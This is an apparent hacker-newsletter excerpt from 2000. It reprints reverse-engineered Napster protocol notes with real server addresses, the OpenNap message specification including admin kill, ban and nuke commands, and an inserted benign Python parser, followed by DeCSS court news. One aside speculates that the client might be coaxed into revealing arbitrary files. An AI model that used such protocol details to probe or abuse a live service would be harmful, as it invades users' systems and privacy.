The trend in digital music copyright enforcement has been to target companies and larger institutions like universities rather than individuals. Napster itself is the target of a lawsuit by the Recording Industry Association of America (RIAA), which accused the company of "facilitating piracy" through its forum for letting online users trade unauthorized music files directly from their PCs. Another company under legal fire from the RIAA is music Web site MP3.com.

Smith said he discovered the Napster security flaw after examining the documentation posted to the Web this week by Stanford University senior David Weekly. Weekly's post irked Napster, which asked him to pull the page. Weekly declined and encouraged the page's dissemination. Today Kessler said the matter with Weekly will rest there.

"We're not going to play the DVD DeCSS game and try to shut it down," Kessler said, referring to the recent controversy over a piece of software called DeCSS that lets users circumvent copyright controls on DVDs. The Motion Picture Association of America has gone after sites to force them to take down copies of the tool.

(Let's face it, if the fedz want to shut you down, you're toast, they just don't put this on a priority level high enough to assign their limited man power to. There are bigger fish to fry, hackers aren't the only users of sniffers and anyone can arp -a netstat -a to see active connections...)

@HWA

Following up on this here's Weekly's site url http://david.weekly.org/ and here's the Napster breakdown (other info available on his site).

I was asked to take this article down, but I politely declined. Since then, I've been informed that things will not escalate. For some strange reason, this writeup got mentioned on slashdot and news.com, although why beats the heck out of me.

Yet To Discover
  How account setup is managed
  Administrative commands
  More details about sending/receiving files
  When "User Error" or such messages are sent

january 26, 2000  corrected a few tidbits
january 23, 2000  initial document release

Network Configuration

Napster appears to have cubes at globalcenter and at AboveNet
Their main router at abovenet is 208.184.213.7

redirect servers: (server.napster.com:8875)
  208.184.216.222
  208.184.216.223

servers:
  208.178.163.61 (globalcenter)
  208.178.175.130-4 (globalcenter)
  208.184.216.202,204-209,211-215,217-221 (abovenet @ sjc2:colo8)
  208.49.239.242,7,8 (globalcenter)

ports: 4444,5555,6666,7777,8888

Interesting. Looks like their general strategy is to cluster in units of 5 IP block (corresponding to grouped rackmounts?) with 5 sets of port numbers for process redundancy on the servers. I bet they started with GlobalCenter, but decided to move in with Abovenet at their SJC2 colocation facility, now that they have their stuff together. That's where the organized clusters are. The Globalcenter unit looks like it's not in California, but connected via an OC48 line to Globalcenter's Herndon, VA node. (Thanks to Ben Byer!)

Protocol Breakdown

Initial Connection

  DNS lookup server.napster.com
  SYN (connect) -> 208.184.216.222 [connects port 8875 on server to 1876 locally]
  RECEIVED 80 bytes of data: "208.49.239.247:5555" (zero-padded)
  RECEIVED 6 0-bytes (Keepalive/synch)
  RESPONDS with 2 0-size packets (ACK)
  SYN (connect) -> 208.49.239.247 [connects port 5555 (surprise) to port 1877 locally]
  SENT to server: 28 00 02 00 username password 23 "v2.0 BETA 5" 10 4398560
  RECEIVED 6 0-bytes
  RECEIVED 10 00 00 00 "Invalid Password"
  RECEIVED 6 0-bytes
  connects again to main server, who suggests 208.178.175.133:8888 this time (fails)
  connects again to main server, who suggests 208.184.216.204 (succeeds)
  RECEIVES 00 00 10 00 03 00 anon@napster.com
  SENT 0A 00 0D 00 nuprin1715
  RECEIVED 0E 00 D6 00 "979 147566 587"

Request for Chat List

  SENT 00 00 69 02 (CHATLIST REQ)
  RECEIVED 26 00 6A 02 "Lobby 33 Welcome to the Lobby channel" 2E
           22 00 6A 02 "Rap 27 Welcome to the Rap channel" 2E
           23 00 6A 02 "Game 0 Welcome to the Game channel" 2E
           24 00 6A 02 "Rock 14 Welcome to the Rock channel" 2E
           35 00 6A 02 "International 1 Welcome to the International channel" 2E
           ...
           35 00 6A 02 "RadioVersions 0 Welcome to the RadioVersions Channel" 2E
           00 00 69 02 (CHATLIST REQ)

Joining a Channel

  SENT 06 00 90 01 "Trance" (JOIN REQUEST)
  RECEIVED 00 00 00 00 00 00 (SYNC)
           06 00 95 01 "Trance" (JOIN GRANTED)
           1B (string size) 00 98 01 "Trance username #songs conn#" (USER LISTING)
           ...
           06 00 99 01 "Trance" (CHANNEL NAME)
           25 00 9A 01 "Trance Welcome to the Trance channel" 2E (CHANNEL DESC)

connection types:
  10 = T3 (or greater)
   9 = T1
   8 = DSL
   7 = Cable modem
   6 = 128k ISDN
   5 = 64k ISDN
   4 = 56k Modem
   3 = 33.6 Modem
   2 = 28.8 Modem
   1 = 14.4 Modem
   0 = Unknown

Talking on a Channel

  SENT 0C 00 92 01 Trance hello                (size 00 92 01 channel message)
  RECEIVED 12 00 93 01 Trance myusername hello (size 00 93 01 channel user message)

Private Messages

  SENT 0B 00 CD 00 myusername hello      (size 00 cd 00 touser message)
  RECEIVED 0B 00 CD 00 myusername hello  (size 00 cd 00 fromuser message)

Whois Requests

  SENT 05 00 5B 02 username
  RECEIVED 3D 00 5C 02 username "User" 6025 "Trance " "Active" 127 0 0 10 "v2.0 BETA 5"

Leaving a Chat Room

  SENT 06 00 91 01 Trance
  RECEIVED [6-byte ack]

Searching for Songs

  SENT 41 00 C8 00 FILENAME CONTAINS "aaaa" MAX_RESULTS 123 LINESPEED "AT BEST" 8 BITRATE "AT LEAST" "128" FREQ "EQUAL TO" "32000"
  RECEIVED 00 00 CA 00 00 00 (NO RESULT)

  RECEIVED (on different query)
           81 00 C9 00 "c:\WINDOWS\DESKTOP\mp3s\Nirvana-Lithium.mp3" (32-byte checksum) (size in bytes) (bitrate in kbps) (freq) (duration in seconds) (username) (magic cookie - "643813570") (line speed)
           92 00 C9 00 "G:\Program Files\napster\Music\NIRVANA - Smells Like Teen Spirit.mp3" (32-byte checksum) ...
           00 00 CA 00 00 00

  [GASP!] Napster SENT the COMPLETE location of the file!!!! Does this mean that there is a way to coax the client to offer up ANY file?

  NOTE: ping time requirements not SENT to server (duh).

Hotlisting a User

  SENT 0E 00 CF 00 username
  RECEIVED 0E 00 2D 01 username (user is online)
           10 00 D1 00 username (user added to hotlist)

Listing a User's Files

  SENT 0E 00 D3 00 username
  RECEIVED 85 00 D4 00 username "D:\Nyhemladdade mp3 or\POWER-BEAT - Dance Club Megamixes.mp3" (32-byte checksum) (size in bytes) (kbps) (freq) (length in seconds)
           ...
           (size) 00 D5 00 (username) (= END OF RESULTS)

Requesting a File

  SENT 2A 00 CB 00 username "C:\MP3\REM - Everybody Hurts.mp3"
  RECEIVED 5D 00 CC 00 username 2965119704 (IP-address backward-form = A.B.C.D) 6699 (port) "C:\MP3\REM - Everybody Hurts.mp3" (song) (32-byte checksum) (line speed)

  [connect to A.B.C.D:6699]
  RECEIVED from client 31 00 00 00 00 00
  SENT to client GET
  RECEIVED from client 00 00 00 00 00 00
  SENT to client Myusername "C:\MP3\REM - Everybody Hurts.mp3" 0 (port to connect to)
  RECEIVED from client (size in bytes)
  SENT to server 00 00 DD 00 (give the go-ahead thru server)
  RECEIVED from client [DATA]

Sending a File

  [no information yet]

General Packet Format

  [chunksize] [chunkinfo] [data...]

  CHUNKSIZE: Intel-endian 16-bit integer size of [data...] in bytes
  CHUNKINFO: (hex) Intel-endian 16-bit integer. first byte:
    00 - login rejected
    02 - login requested
    03 - login accepted
    0D - challenge? (nuprin1715)
    2D - added to hotlist
    2E - browse error (user isn't online!)
    2F - remove user from hotlist OR user is offline
    5B - whois query
    5C - whois result
    5D - whois: user is offline!
    69 - list all channels
    6A - channel info
    90 - join channel
    91 - leave channel
    92 - send text to channel
    93 - receive text from channel
    94 - user error
    95 - join request granted
    96 - user has joined channel
    97 - user has left channel
    98 - username entry for list
    99 - channel name announcement
    9A - channel description
    C8 - send search query
    C9 - query result
    CA - end of query results
    CB - request file
    CC - download reply
    CD - send/receive private message
    CE - download error (they hung up!)
    CF - add user to hotlist
    D1 - user is online (on hotlist)
    D3 - query user's file listings
    D4 - listing entry
    D5 - end of entries
    D6 - update from server (SONGS USERS GIGABYTES)
    DA - begin transmission?
    DD - starting to transmit?
    F4 - Give push goahead (when connect port is 0)

When you're requesting a file from another client, and they ask you to connect to port ZERO, they don't want you to pull the file from them; they want to push the file to you directly. If you receive this, send a 0-length F4 (Give Push Goahead) to the Napster server, and the other client will connect to you.

(More tech info in next article - Ed)

@HWA

62.0 Dissecting the Napster system
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

More info following up from previous article

Source: http://opennap.sourceforge.net/napster.txt

napster messages
================

by drscholl@users.sourceforge.net
February 1, 2000

0. Foreword

This is meant to be an open specification. If you find errors or know of additional functionality not described hereafter, please send me email. It benefits the entire community to have a complete and accurate protocol specification. Not only does it allow for clients to be developed for any platform, but also decreases the strain on the server having to parse out bad client messages.

Disclaimer: the following information was gathered by analyzing the protocol between the linux nap client and may not resemble the official windows client protocol.

1. Client-Server protocol

each message to/from the server is in the form of

<length><type><data>

where <length> and <type> are 2 bytes each. <length> specifies the length in bytes of the <data> portion of the message. Be aware that <length> and <type> appear to be in little-endian format (least significant byte goes first). For example, in the C language you would encode the number 1 as

const unsigned char num[2] = { 0x01, 0x00 };

and 256 would be encoded as

const unsigned char num[2] = { 0x00, 0x01 };

[The above is for illustrative purposes only, there are much quicker ways to actually encode a number. -ed]

Note that in many cases, strings are passed as double-quoted entries.
For example, filenames and client id strings are always sent as

    "random band - generic cowboy song.mp3"

or

    "nap v0.8"

Where required, double quotes are used in the description of the messages below.

Some additional information about use of quotes inside of quotes:

> The answer is, no, it doesn't do escaping of quotes. If you try searching
> for the phrase 'a "quoted" string' on the windows client, you get no songs
> found, and "invalid search request" printed in yellow in your console
> window. (don't know what code that is, sorry.)
>
> and no wonder-- a little birdie told me that the client sends this:
>
> FILENAME CONTAINS "a "quoted" string" MAX_RESULTS 100

[contributed by Ben Byer <bbyer@rice.edu>. -ed]

Note that unlike the IRC protocol, each line does NOT end in \r\n. The <length> field specifies exactly how much data you should read.

2. Message Types

The following section describes the format of the <data> section for each specific message type. Each field is denoted with <>. The fields in a message are separated by a single space character (ASCII 32). Where appropriate, examples of the <data> section for each message are given.

<type> can be one of the following (converted to big-endian):

0    error message [SERVER]

     <message>

2    client login message [CLIENT]

     <username> <password> <port> "<client-info>" <link-type>

     <port> is the port the client is listening on for data transfer. if this value is 0, it means that the client is behind a firewall and can only push files outward. it is expected that requests for downloads be made using the 500 message (see below)
     <client-info> is a string containing the client version info
     <link-type> is an integer indicating the client's bandwidth
         0   unknown
         1   14.4 kbps
         2   28.8 kbps
         3   33.6 kbps
         4   56.7 kbps
         5   64K ISDN
         6   128K ISDN
         7   Cable
         8   DSL
         9   T1
         10  T3 or greater

     Example:
     foo badpass 6699 "nap v0.8" 3

3    login ack [SERVER]

     <email>

     the server sends this message to the client after a successful login (2). If the nick is registered, the <email> address given at registration time is returned. If the nick is not registered, a dummy value is returned.

4    ??? [CLIENT]

     <n>

     the latest napster v2.0beta5a sends this prior to login.

6    alternate login format [CLIENT]

     <nick> <pass> <port> "<client-info>" <linkspeed> <email-address>

     this message is used when logging in for the first time after registering (0x07) a nick. note: this message is similar to the 0x02 message, with the addition of <email-address> on the end

     Example:
     foo foo 6699 "nap v0.8" 3 email@here.com

7    client registration message [CLIENT]

     <nick>

     this message is sent to create an account. response to this message is one of 8, 9 or 10

8    registration success [SERVER]

     the server sends this when the client's request to register a new nickname has succeeded.

9    nickname already registered [SERVER]

     the server sends this message when the nickname the client has requested has already been registered by another user

10   invalid nickname [SERVER]

     the server sends this message when the client attempts to register an invalid nickname [what defines an invalid nickname? -ed]

11   ??? [CLIENT]

     [returns "parameters are unparsable" -ed]

14   login options [CLIENT]

     NAME:%s ADDRESS:%s CITY:%s STATE:%s PHONE:%s AGE:%s INCOME:%s EDUCATION:%s

100  client notification of shared file [CLIENT]

     "<filename>" <md5> <size> <bitrate> <frequency> <time>

     <md5> see section "MD5"
     <size> is bytes
     <bitrate> is kbps
     <frequency> is hz
     <time> is seconds

     Example:
     "generic band - generic song.mp3" b92870e0d41bc8e698cf2f0a1ddfeac7 443332 128 44100 60

102  remove file [CLIENT]

     <filename>

     client requests to remove file from shared library

200  client search request [CLIENT]

     [FILENAME CONTAINS "artist name"] MAX_RESULTS <max>
     [FILENAME CONTAINS "song"] [LINESPEED <compare> <link-type>]
     [BITRATE <compare> "<br>"] [FREQ <compare> "<freq>"]

     The artist name and the song name are, obviously, treated the same by the server; confirm this for yourself on the windows client. max is a number; if it is greater than 100, the server will only return 100 results.
     <compare> is one of the following: "AT LEAST" "AT BEST" "EQUAL TO"
     <link-type> see 0x02 (client login) for a description
     <br> is a number, in kbps
     <freq> is a sample frequency, in Hz

     The windows client filters by ping time inside the client. It pretty much has to, and it's easy to see the result by setting ping time to at best 100 ms or so, and max search terms to 50. You'll get back like 3 results, but the client will still tell you that it found "50 results".

     Examples:
     FILENAME CONTAINS "Sneaker Pimps" MAX_RESULTS 75
     FILENAME CONTAINS "tesko suicide" BITRATE "AT LEAST" "128" MAX_RESULTS 100
     FILENAME CONTAINS "Ventolin" LINESPEED "EQUAL TO" 10

     [Thanks to Ben Byer <bbyer@rice.edu> for this contribution. -ed]

201  search response [SERVER]

     "<filename>" <md5> <size> <bitrate> <frequency> <length> <nick> <ip> <link-type>

     <md5> see section "MD5"
     <size> is file size in bytes
     <bitrate> is mp3 bit rate in kbps
     <frequency> is sample rate in hz
     <length> is the play length of the mp3 in seconds
     <nick> the person sharing the file
     <ip> is an unsigned long integer representing the ip address of the user with this file
     <link-type> see the client login (2) message for a description

     Example:
     "random band - random song.mp3" 7d733c1e7419674744768db71bff8bcd 2558199 128 44100 159 lefty 3437166285 4

202  end of search response from server [SERVER]

     no data.

203  download request [CLIENT]

     <nick> "<filename>"

     client requests to download <filename> from <nick>. client expects to make an outgoing connection to <nick> on their specified data port.

     Example:
     mred "C:\Program Files\Napster\generic cowboy song.mp3"

     SEE ALSO: 500 alternate download request

204  download ack [SERVER]

     <nick> <ip> <port> "<filename>" <md5> <linespeed>

     server sends this message in response to a 203 request.
     <nick> is the user who has the file
     <ip> is an unsigned long integer representing the ip address
     <port> is the port <nick> is listening on
     <filename> is the file to retrieve
     <md5> is the md5 sum
     <linespeed> is the user's connection speed (see login(2))

     Example:
     lefty 4877911892 6699 "generic band - generic song.mp3" 10fe9e623b1962da85eea61df7ac1f69 3

205  private message to/from another user [CLIENT, SERVER]

     <nick> <message>

     note the same type is used for a client sending a msg or receiving one

     [Commentary: this message causes problems if you consider linking servers together. With the current one server situation, the server just rewrites the message it receives with the name of the client that sent it and passes it to the recipient client. However, in the case where the recipient and sender are not on the same server, there is loss of information without encapsulating it. It would have been better to put both the sender and recipient because if the servers are ever linked they will have to make a new message type for this situation. -ed]

206  get error [SERVER]

     <nick> <filename>

     the server sends this message when the file that the user has requested to download is unavailable (such as the user is not logged in).

207  add hotlist entry [CLIENT]

     <user>

     client is requesting notification when <user> logs in or out.

209  user signon [SERVER]

     <user> <speed>

     server is notifying client that a user in their hotlist, <user>, has signed on the server with link <speed>

210  user signoff [SERVER]

     <user>

     server is notifying client that a user on their hotlist, <user>, has signed off the server. this message is also sent by the server when the client attempts to browse a nonexistent client. [why don't they just use 404 for this? -ed]

211  browse a user's files [CLIENT]

     <nick>

     the client sends this message when it wants to get a list of the files shared by a specific client

212  browse response [SERVER]

     <nick> "<filename>" <md5> <size> <bitrate> <frequency> <time>

     <nick> is the user contributing the file
     <filename> is the mp3 file contributed
     <md5> is the hash of the mp3 file
     <size> is the file size in bytes
     <bitrate> is the mp3 bitrate in kbps
     <frequency> is the sampling frequency in Hz
     <time> is the play time in seconds

     Example:
     foouser "generic band - generic song.mp3" b92870e0d41bc8e698cf2f0a1ddfeac7 443332 128 44100 60

213  end of browse list [SERVER]

     <nick>

     indicates no more entries in the browse list for <user>

214  server stats [CLIENT, SERVER]

     client: no data
     server: <users> <# files> <size>

     <size> is approximate total library size in gigabytes
     this message is sent by the server occasionally without request

     Example:
     553 64692 254

215  request resume [CLIENT]

     <checksum> <filesize>

     client is requesting a list of all users which have the file with these characteristics. the server responds with a list of 216 messages for each match, followed by a 217 message to terminate the list

216  resume search response [SERVER]

     <user> <ip> <port> <filename> <checksum> <size> <speed>

     this message contains the matches for the resume request (215). the list is terminated by a 217 message.

217  end of resume search list [SERVER]

     no data. this message terminates a list of 216 messages initiated by a 215 client request

218  downloading file [CLIENT]

     no body. client sends this message to the server to indicate they are in the process of downloading a file. this adds 1 to the download count which the server maintains.

219  download complete [CLIENT]

     no body. client sends this message to the server to indicate they have completed the file for which a prior 218 message was sent. this subtracts one from the download count the server maintains

220  uploading file [CLIENT]

     no body.
     client sends this message to indicate they are uploading a file. this adds one to the upload count maintained by the server.

221  upload complete [CLIENT]

     no body. client sends this message when they are finished uploading a file. this subtracts one from the upload count maintained by the server.

301  hotlist ack [SERVER]

     <user>

     server is notifying client that <user> has successfully been added to their hotlist

302  hotlist error [SERVER]

     <user>

     server is notifying client that it was unable to add <user> to their hotlist. [can you only add registered nicks to your hotlist? -ed]

303  remove user from hotlist [CLIENT]

     <user>

     client is notifying the server that it no longer wishes to request notifications about <user> when they sign on or off the server. no response is sent in return.

400  join channel [CLIENT]

     <channel-name>

     the client sends this command to join a channel

401  part channel [CLIENT]

     <channel-name>

     the client sends this command to part a channel

402  send public message [CLIENT]

     <channel> <message>

403  public message [SERVER]

     <channel> <nick> <text>

     this message is sent by the server when a client sends a public message to a channel.

     Example:
     80's espinozaf hello...hola

404  user/channel does not exist [SERVER]

     <error-message>

     This message is sent to the client when the client has requested an operation on another client or channel which is invalid.

     Examples:
     User nosuchuser is not currently online.
     Channel #nosuchchannel does not exist!
     permission denied
     ping failed, shtien is not online

405  join acknowledge [SERVER]

     <channel>

     the server sends this message to the client to acknowledge that it has joined the requested channel (400)

406  join message [SERVER]

     <channel> <user> <sharing> <link-type>

     <user> has joined <channel>

     Example:
     80's WilmaFlinstone 12 2

407  user parted channel [SERVER]

     <channel> <nick> <sharing> <linespeed>

     Example:
     80's DLongley 23 7

408  channel user list entry [SERVER]

     this message is identical to the join (406) message. the server will send the list of users in the channel prior to the client join command in this message. joins that occur after the client has joined will be noted by a 406 message.

409  end of channel user list [SERVER]

     <channel>

     this message is sent by the server to indicate it has sent all information about the users in a channel

410  channel topic [CLIENT, SERVER]

     <channel> <topic>

     sent when joining a channel or a new topic is set. a client requesting topic change also uses this message. [why didn't they put a field to indicate WHO changed the topic? as it is now you can only tell that it was changed. -ed]

500  alternate download request [CLIENT]

     <nick> "<filename>"

     requests that <nick> make an outgoing connection to the requester's client and send <filename>. this message is for use when the person sharing the file can only make an outgoing tcp connection because of firewalls blocking incoming messages. this message should be used to request files from users who have specified their data port as 0 in their login message

501  alternate download ack [SERVER]

     <nick> <ip> <port> "<filename>" <md5> <speed>

     this message is sent to the uploader when their data port is set to 0 to indicate they are behind a firewall and need to push all data outward. the uploader is responsible for connecting to the downloader to transfer the file.

600  request user's link speed [CLIENT]

     <nick>

601  link speed response [SERVER]

     <nick> <linespeed>

603  whois request [CLIENT]

     <nick>

604  whois response [SERVER]

     <nick> "<user-level>" <time> "<channels>" <status> <shared> <downloads> <uploads> <link-type> "<client-info>" [ <total uploads> <total_downloads> <ip> <connecting port> <data port> <email> ]

     <user-level> is one of "User" or "Admin"
     <time> is seconds this user has been connected
     <channels> is the list of channels the client is a member of, each separated by a space (ASCII 32)
     <status> is one of "Active." or "Inactive." if they are on or offline
     <shared> is number of files user has available for download
     <downloads> is the current number of downloads in progress
     <uploads> is the current number of uploads in progress
     <link-type> see 0x02 (client login) above
     <client-info> see 0x02 (client login) above

     The following fields are displayed for user level moderator and above:
     <total uploads>
     <total downloads>
     <ip> note: can be "unavailable"
     <connecting port>
     <data port>
     <email> note: can be unavailable

     Example:
     lefty "User" 1203 "80's " "Active" 0 0 0 3 "nap v0.8"

605  whowas response [SERVER]

     <user> <level> <last-seen>

     if the user listed in a 603 request is not currently online, the server sends this message.
     <user> is the user for which information was requested
     <level> is the user's last known userlevel (user/mod/admin)
     <last-seen> is the last time at which this user was seen, measured as seconds since 12:00am on January 1, 1970 (UNIX time_t).

606  change user level [CLIENT]

     <nick> <level>

     changes the privileges for <nick> to <level>. client must be admin level to execute this request [I have not verified this message since I don't have admin status on any of the servers. -ed]

607  upload request [CLIENT]

     <nick> "<filename>"

     this message is used to notify the client that user <nick> has requested upload of <filename>

     Example:
     lefty "generic band - generic song.mp3"

608  accept upload request [CLIENT]

     <nick> "<filename>"

     client is notifying server that upload of <filename> to <nick> is accepted, and that the requesting client may begin download

     Example:
     lefty "generic band - generic song.mp3"

610  kill (disconnect) a user [CLIENT]

     <nick>

     client request to disconnect a user. client must be "Admin" level to execute this command

611  nuke a user [CLIENT]

     <nick>

     client request to delete account for <nick>

612  ban user [CLIENT]

613  set data port for user [CLIENT]

614  unban user [CLIENT]

615  show bans for server [CLIENT]

     client requests the list of banned ips for the current server

616  ip ban notification [SERVER]

     <ip> <nick> "<reason>" <time>

     <ip> is the string version of the ip banned
     <nick> is the user setting the ban
     <reason> is the reason given
     <time> is the time_t when the ban was set

     This message is sent in response to the 615 client request, one for each ban.

     Example:
     207.172.245. valkyrie "" 947304224

617  list channels [CLIENT, SERVER]

     no data. client requests a list of channels on the server. server responds with 618/617. server indicates end of channel list using this message.

618  channel list entry [SERVER]

     <channel-name> <number-of-users> <topic>

     this is the server response to a 617 client request, one for each channel.

     Example:
     Help 50 OpenNap help channel

620  ??? [SERVER]

     <nick> "<filename>" <filesize> <digit>

621  message of the day, sent after client login [SERVER]

     <motd-text>

     each 621 message contains a single line of text

622  muzzle a user [CLIENT]

     <nick> [ <reason> ]

     client requests that <nick> not be allowed to send public messages

623  unmuzzle a user [CLIENT]

     <nick>

     client requests that the enforced silence on <nick> be lifted

624  un-nuke a user

625  change a user's linespeed

626  data port error

     <user>

     client is informing server that it was unable to connect to the data port for <user>

627  operator message [CLIENT, SERVER]

     client: <text>
     server: <nick> <text>

     client request to send a message to all admins/moderators

628  global message [CLIENT, SERVER]

     client: <text>
     server: <nick> <text>

     client request to send a message to all users

629  banned users [SERVER]

     <nick>

     when displaying the ban list for the server, this message is used to indicate banned nicknames.
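The following Python is an added example, not code from napster.txt, the OpenNap project or the HWA article above. It puts the framing rules of section 1 and the message formats of section 2 into a runnable form: a <length><type><data> encoder and an incremental decoder that respects the "no \r\n, trust the length field" rule, a tokenizer for the double-quoted fields, a validating parser for the 200 search request (so the unescaped-quote case from the Ben Byer note is rejected rather than guessed at) and a decoder for the 201 search response. Two assumptions are labelled in the code: the helper names are hypothetical, and the <ip> integer is rendered using the "backward form" reported in the previous article (least significant byte is the first octet), which the spec itself does not state.

```python
import struct
from typing import List, Tuple

# <length><type>, each a 16-bit little-endian ("Intel-endian") integer
HEADER = struct.Struct("<HH")

COMPARE = {"AT LEAST", "AT BEST", "EQUAL TO"}  # the three <compare> values in message 200


def encode_message(msg_type: int, data: str) -> bytes:
    """Frame one message as <length><type><data>; <length> counts only <data>."""
    payload = data.encode("latin-1")
    if len(payload) > 0xFFFF:
        raise ValueError("data does not fit in a 16-bit length field")
    return HEADER.pack(len(payload), msg_type) + payload


class FrameDecoder:
    """Incremental decoder for a TCP stream of <length><type><data> frames.

    There is no \\r\\n terminator, so the decoder buffers partial reads and
    only releases a message once the full <length> bytes have arrived.
    (Hypothetical helper, not part of any Napster client.)
    """

    def __init__(self) -> None:
        self._buf = bytearray()

    def feed(self, chunk: bytes) -> List[Tuple[int, str]]:
        """Append received bytes; return every complete (type, data) message."""
        self._buf.extend(chunk)
        messages = []
        while len(self._buf) >= HEADER.size:
            length, msg_type = HEADER.unpack_from(self._buf)
            end = HEADER.size + length
            if len(self._buf) < end:
                break  # wait for the rest of this frame
            messages.append((msg_type, bytes(self._buf[HEADER.size:end]).decode("latin-1")))
            del self._buf[:end]
        return messages


def tokenize(data: str) -> List[str]:
    """Split <data> on spaces, keeping double-quoted entries as one token.

    The protocol has no quote escaping: an embedded quote ends the token
    early and the leftover pieces surface as bogus bare words.
    """
    tokens, i, n = [], 0, len(data)
    while i < n:
        if data[i] == " ":
            i += 1
        elif data[i] == '"':
            end = data.find('"', i + 1)
            if end < 0:
                raise ValueError("unterminated quoted field")
            tokens.append(data[i + 1:end])
            i = end + 1
        else:
            end = data.find(" ", i)
            end = n if end < 0 else end
            tokens.append(data[i:end])
            i = end
    return tokens


def parse_search_request(data: str) -> dict:
    """Validate a 200 search request against the grammar in the spec.

    Anything outside the grammar raises, which is what a server should do
    instead of guessing (the foreword notes bad client messages strain the server).
    """
    toks = tokenize(data)
    query = {"filename_contains": [], "max_results": 100}
    i = 0
    while i < len(toks):
        key = toks[i]
        if key == "FILENAME" and toks[i + 1:i + 2] == ["CONTAINS"] and i + 2 < len(toks):
            query["filename_contains"].append(toks[i + 2])
            i += 3
        elif key == "MAX_RESULTS" and i + 1 < len(toks) and toks[i + 1].isdigit():
            query["max_results"] = min(int(toks[i + 1]), 100)  # server caps at 100
            i += 2
        elif (key in ("LINESPEED", "BITRATE", "FREQ") and i + 2 < len(toks)
              and toks[i + 1] in COMPARE and toks[i + 2].isdigit()):
            query[key.lower()] = (toks[i + 1], int(toks[i + 2]))
            i += 3
        else:
            raise ValueError(f"invalid search request near {key!r}")
    return query


def ip_to_dotted(value: int) -> str:
    """Render the <ip> integer as A.B.C.D.

    Assumption (from the "backward form" note in the preceding article):
    the least significant byte is the first octet.
    """
    if not 0 <= value <= 0xFFFFFFFF:
        raise ValueError("ip field does not fit in 32 bits")
    return ".".join(str((value >> (8 * i)) & 0xFF) for i in range(4))


def parse_search_response(data: str) -> dict:
    """Decode a 201 search response into typed fields."""
    fields = tokenize(data)
    if len(fields) != 9:
        raise ValueError("201 message must have exactly 9 fields")
    filename, md5, size, bitrate, freq, length, nick, ip, link = fields
    return {"filename": filename, "md5": md5, "size": int(size), "bitrate": int(bitrate),
            "frequency": int(freq), "length": int(length), "nick": nick,
            "ip": ip_to_dotted(int(ip)), "link_type": int(link)}


if __name__ == "__main__":
    dec = FrameDecoder()
    wire = encode_message(200, 'FILENAME CONTAINS "Sneaker Pimps" MAX_RESULTS 75')
    print(dec.feed(wire[:3]), dec.feed(wire[3:]))  # first call yields nothing yet
```

Feeding the decoder a split frame shows why the length field, not a newline, drives reassembly; running parse_search_request on the quoted-inside-quotes query from the note above ends in a ValueError at the stray bare word, matching the "invalid search request" the windows client reports.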
700  change link speed [CLIENT]

     <speed>

     client is notifying server that its correct link speed is <speed>, in the range 0-10 (see the login message for details).

702  change email address [CLIENT]

     <email address>

     client wishes to change their email address

703  change data port [CLIENT]

     <port>

     client is changing the data port being listened on for file transfers

751  ping user [CLIENT, SERVER]

     <user>

     client is attempting to determine if <user>'s connection is alive

752  pong response [CLIENT, SERVER]

     <user>

     this message is sent in response to the 751 (PING) request

753  ???

     [returns permission denied. -ed]

800  reload config [CLIENT]

     <config variable>

     resets configuration parameter to its default value

801  server version [CLIENT]

     no data. client requests a server's version

810  set config [CLIENT]

     <config string>

     request a change in server configuration variables

820  clear channel

     <channel>

     [what does this do? -ed]

821  ???
822  ???
823  ???
824  ???

825  user list entry [SERVER]

     <channel> <user> <files shared> <speed>

     an 825 message is sent for each user in the channel specified by the 830 message

     Example:
     Help testor3 0 3

     [This appears to be exactly the same format as the 408 message. -ed]

826  ???
827  ???

830  list users in channel [CLIENT, SERVER]

     <channel>

     client requests a list of all users in <channel>. server responds with an 825 response for each user, followed by an 830 response with no data [why didn't they just use the 409 message? -ed]

3. MD5

It looks like the vast majority of the files are hashed using the first 299,008 bytes of the file. There have been some cases where the hash matches at 300,032 bytes, but no correlation has been drawn as to when that happens. The speculation at this point is that it might have to do with the existence of an ID3v2 tag, or perhaps the file was sampled at 48kHz...?

Note: the linux nap client (versions 0.7 - 0.9) seems to hash exactly 300,000 bytes, which is NOT what the official windows client does.

4. Where to get more help?

Join the napdev mailing list by sending email to napdev-subscribe@onelist.com or by visiting the community page http://www.onelist.com/community/napdev/. This list is designed for open source napster developers to share information about the specification or applications.

5. Acknowledgements

A big THANKS goes to the following people who contributed valuable information to this specification:

Ben Byer <bbyer@rice.edu>
JT <jtraub@dragoncat.net>
Evan Martin <eeyem@u.washington.edu>
Colten Edwards (aka panasync@efnet) <edwards@bitchx.dimension6.com>

@HWA

63.0 HNN: Jan 27: DVD Lawyers Shut Down Courthouse
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Code Kid

Santa Clara County Superior Court Judge William Elfving has sealed the court documents filed by the DVD Copy Control Association because they contain the source code to the DeCSS program. The documents have been publicly available for the last two weeks and have been posted to the internet. Some lawyers have noted that failing to file the documents under seal from the beginning may jeopardize the plaintiff's case.

C|Net
http://news.cnet.com/news/0-1005-200-1533048.html?tag=st.ne.1002.bgif.1005-200-1533048

Wired
http://www.wired.com/news/politics/0,1283,33922,00.html

C|Net;

DVD lawyers spill "secret" code
By Evan Hansen
Staff Writer, CNET News.com
January 26, 2000, 4:10 p.m. PT

A digital rights licensing group seeking to ban the controversial DVD decryption program known as DeCSS has shut down yet another potential distributor: a California state courthouse.

Santa Clara County Superior Court Judge William Elfving today placed under seal source code submitted in a trade secrets case filed by the DVD Copy Control Association against 72 Web sites and individuals earlier this month.

The order for now erases an embarrassing gaffe by attorneys for the group, which is seeking to stop the defendants from publishing or linking to the very same program on the Internet.
It was unclear whether the apparent slip-up could have deeper consequences for the case.

Court papers are generally considered public documents, available to anyone for the asking. Although parties in a case can file a request with the court to make sensitive documents off-limits, the Copy Control Association's attorneys apparently filed the request only after openly submitting the source code as a supporting document to the complaint.

As a result, the document has been legally available at the courthouse for the past two weeks. But the document was lifted from the court and made available on the Internet at the Cryptome.org Web site.

The association's lead attorney in the case, Jeffrey Kessler of the New York law firm Weil, Gotshal & Manges, called today's ruling a non-event.

"Everyone knew (the exhibit) would be placed under seal," he said.

Kessler declined to elaborate on how the exhibit was introduced in the case, saying only that after today's decision the issue "has no further significance whatsoever."

But lawyers for the defense and intellectual property attorneys uninvolved in the case said the gaffe could hurt the plaintiffs' case.

